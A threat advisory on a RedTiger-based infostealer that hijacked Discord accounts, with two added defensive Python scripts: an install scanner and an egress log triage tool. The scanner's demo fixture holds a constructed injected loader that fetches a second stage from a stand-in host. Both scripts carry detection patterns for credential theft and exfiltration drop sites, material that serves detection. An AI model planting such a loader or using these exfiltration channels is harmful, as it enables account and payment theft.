Executive Summary
In early June 2024, security researchers documented a campaign in which attackers used a RedTiger-based infostealer to target Discord users. RedTiger is an open-source red-team tool; the attackers built a custom stealer from it that harvests Discord account credentials and stored payment data by injecting malicious code into the Discord desktop client's installation directories, where it can intercept the client's own login, MFA and payment events. Victims were typically infected through malicious downloads or phishing sites and unknowingly handed authentication tokens and payment details to the attackers. Stolen accounts were then sold or reused for fraud and account takeovers, exposing both personal and organizational data.
This incident highlights an escalating trend of using open-source red-team tools for malicious infostealer campaigns, boosting attackers’ agility and reach. It underscores the risk of credential-based attacks on popular platforms, the need for real-time threat detection, and reinforces the importance of continuous endpoint monitoring and stronger egress security controls.
Why This Matters Now
Discord's widespread use for both personal and professional communication makes it an attractive target. Adversaries' adoption of open-source red-team tooling such as RedTiger shortens the weaponization cycle, so organizations and individuals must respond quickly to new infostealer variants. Because the infection vector here is user execution of a malicious download rather than a software vulnerability, security awareness, controls on untrusted downloads, and stronger access controls are the mitigations that matter most.
Attack Path Analysis
Attackers seeded the RedTiger-based infostealer through social engineering or malicious downloads, gaining a foothold on the victim's system and access to the local Discord installation and browser profiles. Running with the infected user's privileges, the malware collected Discord tokens, browser-stored credentials, cookies and payment data; any reach beyond that host (additional accounts, applications or data repositories) came from reuse of the harvested secrets rather than from lateral movement by the stealer itself, which is why the technique list below contains only local collection and exfiltration. The stealer then contacted attacker-controlled infrastructure and exfiltrated the harvested data over egress channels that were not monitored or adequately filtered. The impact was compromised accounts, financial loss, and downstream abuse of the stolen identities.
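The executive summary describes the stealer injecting code into the Discord desktop client's own directories. The following host check is an added example (not part of the advisory, and not code from RedTiger or Discord) for finding that tampering. It assumes the default install layouts (Windows: %LOCALAPPDATA%\Discord\app-<version>\modules\discord_desktop_core-<n>\discord_desktop_core\index.js; macOS/Linux: the equivalent under Application Support or ~/.config) and that the pristine loader is the single line `module.exports = require('./core.asar');`. The pattern names and the demo install tree are constructed for the example, not indicators from the campaign.

```python
"""Scan Discord desktop installs for an injected discord_desktop_core loader.

Added example for this advisory. Assumptions (see lead-in): default install
paths, and a pristine index.js that is exactly the one-line require below.
"""
import os
import re
import sys
import tempfile
from pathlib import Path

# Assumed pristine loader; anything else is reviewed, not trusted.
PRISTINE_INDEX_JS = "module.exports = require('./core.asar');"

# Heuristics for an injected loader (our own names, not campaign IOCs).
SUSPICIOUS_PATTERNS = {
    "hardcoded_url": re.compile(r"https?://[\w./:-]+"),
    "webhook_endpoint": re.compile(r"api/webhooks/"),
    "credential_keywords": re.compile(r"\b(token|password|mfa|card|cvv)\b", re.I),
    "process_spawn": re.compile(r"child_process|powershell|cmd\.exe"),
    "remote_fetch": re.compile(r"\b(fetch|https\.get|XMLHttpRequest)\b"),
}


def assess_index_js(content: str) -> dict:
    """Classify one index.js body: {"tampered": bool, "findings": [names]}."""
    if content.strip() == PRISTINE_INDEX_JS:
        return {"tampered": False, "findings": []}
    findings = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(content)]
    if not findings:
        findings.append("non_pristine_loader")  # differs, but no known pattern
    return {"tampered": True, "findings": findings}


def candidate_roots() -> list:
    """Default Discord data roots per OS (assumed paths; adjust for your fleet)."""
    home = Path.home()
    if sys.platform.startswith("win"):
        base = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
        return [base / n for n in ("Discord", "DiscordPTB", "DiscordCanary")]
    if sys.platform == "darwin":
        return [home / "Library" / "Application Support" / n
                for n in ("discord", "discordptb", "discordcanary")]
    return [home / ".config" / n for n in ("discord", "discordptb", "discordcanary")]


def find_core_index_files(root: Path) -> list:
    """Every discord_desktop_core/index.js under any app-<version>/modules tree."""
    if not root.is_dir():
        return []
    return sorted(root.glob("**/discord_desktop_core-*/discord_desktop_core/index.js"))


def scan_roots(roots) -> list:
    """Scan all roots; one result dict per core index.js found."""
    results = []
    for root in roots:
        for path in find_core_index_files(Path(root)):
            verdict = assess_index_js(path.read_text(encoding="utf-8", errors="replace"))
            results.append({"path": str(path), **verdict})
    return results


def demo() -> list:
    """Constructed two-install tree (one clean, one injected) scanned in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "Discord"
        clean = root / "app-1.0.9000" / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
        dirty = root / "app-1.0.9001" / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
        for d in (clean, dirty):
            d.mkdir(parents=True)
        (clean / "index.js").write_text(PRISTINE_INDEX_JS + "\n")
        # Constructed stand-in for an injected loader: pulls a second stage,
        # then keeps the original require so the client still starts normally.
        (dirty / "index.js").write_text(
            "const https = require('https');\n"
            "https.get('https://example.invalid/stage2.js', r => {});\n"
            "module.exports = require('./core.asar');\n"
        )
        return scan_roots([root])


if __name__ == "__main__":
    results = scan_roots(sys.argv[1:] or candidate_roots())
    if not results:
        print("no Discord core modules found; scanning constructed demo tree instead")
        results = demo()
    for r in results:
        flag = "TAMPERED" if r["tampered"] else "ok"
        print(f"{flag:8} {r['path']}  {','.join(r['findings'])}")
```

Run it as the user whose profile you are checking (the install lives under the per-user profile); a tampered verdict is a trigger to quarantine the file for analysis, reinstall the client, and rotate the account's token and password from a clean device.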
Kill Chain Progression
Initial Compromise
Description
User systems were infected with the RedTiger-based infostealer through malicious downloads or phishing, granting attackers initial foothold to harvest Discord data.
MITRE ATT&CK® Techniques
User Execution (T1204)
Input Capture: Keylogging (T1056.001)
Email Collection (T1114)
Unsecured Credentials: Credentials In Files (T1552.001)
Data from Local System (T1005)
Exfiltration Over C2 Channel (T1041)
Credentials from Password Stores: Credentials from Web Browsers (T1555.003)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Authentication for all system components
Control ID: 8.2.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management
Control ID: Art.9(2)
CISA ZTMM 2.0 – Continuous Monitoring and Threat Detection
Control ID: 3.2.2
NIS2 Directive – Policies and Procedures to Assess Effectiveness of Cybersecurity Risk Management
Control ID: Art.21(2)(e)
Sector Implications
Industry-specific impact of the campaign, including operational, regulatory, and cloud security risks.
Computer Games
Gaming platforms face direct Discord account theft targeting player communities, payment data, and virtual assets through RedTiger-based infostealers.
Financial Services
Payment information theft via Discord channels threatens financial institutions with data breaches, requiring enhanced egress security and anomaly detection.
E-Learning
Educational Discord communities are vulnerable to credential-harvesting attacks that compromise student data; zero trust segmentation limits what a compromised account can reach.
Information Technology/IT
IT sector faces heightened risk from open-source red-team tool abuse, necessitating threat detection capabilities and secure communication protocols.
Sources
- Hackers steal Discord accounts with RedTiger-based infostealer (BleepingComputer): https://www.bleepingcomputer.com/news/security/hackers-steal-discord-accounts-with-redtiger-based-infostealer/
- New Arcane infostealer infects YouTube, Discord users via game cheats (BleepingComputer): https://www.bleepingcomputer.com/news/security/new-arcane-infostealer-infects-youtube-discord-users-via-game-cheats/
- Discord Turned Into an Account Stealer by Updated Malware (BleepingComputer): https://www.bleepingcomputer.com/news/security/discord-turned-into-an-account-stealer-by-updated-malware/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, a strict egress policy, real-time threat detection, and encrypted-traffic inspection could have broken the kill chain by limiting what the infected host could reach, restricting where data could leave to, and alerting on the stealer's behaviour. CNSF-enforced boundaries and inspection hinder east-west movement and covert exfiltration, reducing the blast radius.
Control: Threat Detection & Anomaly Response
Mitigation: Anomalous process or network activity triggers early alerts.
Control: Zero Trust Segmentation
Mitigation: Identity-based least privilege limits attacker's ability to access privileged data.
Control: East-West Traffic Security
Mitigation: Internal traffic inspection blocks unauthorized pivots.
Control: Cloud Firewall (ACF) & Inline IPS (Suricata)
Mitigation: Outbound C2 connections are detected and possibly blocked.
Control: Egress Security & Policy Enforcement
Mitigation: Sensitive outbound data flows are restricted or alerted upon.
Rapid detection and containment limit post-exfiltration business impact.
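The egress and C2 controls above say outbound connections are "detected and possibly blocked" and sensitive flows are "restricted or alerted upon". The following triage script is an added example of what that policy looks like in practice; it is not CNSF, Suricata, or any vendor's code. It assumes a per-process destination baseline, a short list of file-drop hosts that stealers are known to abuse, and that a desktop host has no business POSTing to Discord's webhook API (webhooks are meant to be called by bots and servers). The JSON proxy log lines, process names and hosts are constructed for the example.

```python
"""Egress triage over per-process proxy logs: alert or block anomalous uploads.

Added example for this advisory. The baseline, drop-site list and log format
are assumptions for illustration, not vendor or campaign data.
"""
import json

# Assumed baseline: process -> destination suffixes it is expected to reach.
# Build the real one from your fleet's observed traffic; "*" is a placeholder
# for browsers and should be narrowed in production.
EGRESS_BASELINE = {
    "discord.exe": ("discord.com", "discordapp.com", "discord.gg", "discord.media"),
    "chrome.exe": ("*",),
    "svchost.exe": ("microsoft.com", "windowsupdate.com"),
}

# Assumed list of upload/paste hosts that stealers use as drop sites.
DROP_SITE_SUFFIXES = ("gofile.io", "transfer.sh", "anonfiles.com", "pastebin.com")
WEBHOOK_PATH = "/api/webhooks/"      # Discord webhook API, a common exfil channel
LARGE_UPLOAD_BYTES = 512 * 1024      # assumed threshold for an unexpected upload
BLOCK_REASONS = {"discord_webhook_post", "file_drop_site"}


def _matches(host: str, suffixes) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in suffixes)


def host_allowed(process: str, host: str) -> bool:
    """True if the (process, destination) pair is in the baseline."""
    allowed = EGRESS_BASELINE.get(process.lower(), ())
    return "*" in allowed or _matches(host, allowed)


def evaluate(event: dict) -> list:
    """Return the list of policy reasons an event trips (empty means clean)."""
    reasons = []
    proc, host = event["process"], event["host"]
    path, method = event.get("path", "/"), event.get("method", "GET").upper()
    allowed = host_allowed(proc, host)
    if not allowed:
        reasons.append("unbaselined_process_destination")
    if method == "POST" and WEBHOOK_PATH in path:
        reasons.append("discord_webhook_post")
    if _matches(host, DROP_SITE_SUFFIXES):
        reasons.append("file_drop_site")
    if method in ("POST", "PUT") and not allowed and event.get("bytes_out", 0) >= LARGE_UPLOAD_BYTES:
        reasons.append("large_unbaselined_upload")
    return reasons


def triage(log_lines) -> list:
    """Parse JSON-per-line proxy logs; emit one alert per event that trips policy."""
    alerts = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = evaluate(event)
        if reasons:
            alerts.append({
                "ts": event["ts"], "process": event["process"], "host": event["host"],
                "reasons": reasons,
                "action": "block" if BLOCK_REASONS & set(reasons) else "alert",
            })
    return alerts


# Constructed sample log: a normal client call, a browser upload to a drop site,
# an unknown binary posting to a Discord webhook, and routine OS traffic.
SAMPLE_LOG = """
{"ts":"2024-06-03T10:01:05Z","process":"discord.exe","host":"discord.com","method":"GET","path":"/api/v9/users/@me","bytes_out":412}
{"ts":"2024-06-03T10:01:09Z","process":"chrome.exe","host":"gofile.io","method":"POST","path":"/uploadFile","bytes_out":2097152}
{"ts":"2024-06-03T10:01:11Z","process":"updater_3f2.exe","host":"discord.com","method":"POST","path":"/api/webhooks/000000/constructed","bytes_out":4096}
{"ts":"2024-06-03T10:01:20Z","process":"svchost.exe","host":"dl.windowsupdate.com","method":"GET","path":"/msdownload/x","bytes_out":90}
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG.splitlines()):
        print(f"{alert['action']:5} {alert['ts']} {alert['process']} -> {alert['host']}: {', '.join(alert['reasons'])}")
```

The two "block" verdicts are the exfiltration step of the kill chain: the webhook POST from an unrecognised binary and the browser upload to a drop site. The baseline check alone would also have surfaced the unknown process before any data left, which is the earlier point at which a strict egress policy pays off.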
Impact at a Glance
Affected Business Functions
- User Account Management
- Payment Processing
Estimated downtime: 3 days
Estimated loss: $50,000
The infostealer targets Discord account data, including user tokens, email addresses, multi-factor authentication details, and payment information such as PayPal and credit card details. Additionally, it harvests browser-stored credentials, cookies, and cryptocurrency wallet data, leading to potential unauthorized access and financial fraud.
Recommended Actions
Key Takeaways & Next Steps
- Enforce granular zero trust segmentation to prevent malware moving laterally and accessing sensitive Discord or credential data.
- Deploy egress controls and rigorous policy enforcement to restrict unauthorized outbound connections and data exfiltration attempts.
- Implement advanced threat detection and anomaly response for early warning on infostealer behaviors and suspicious network activity.
- Ensure encrypted traffic monitoring and high-performance line-rate encryption to avert packet sniffing or data theft in transit.
- Centralize multicloud visibility and automation to speed incident response and reduce time to containment after detection.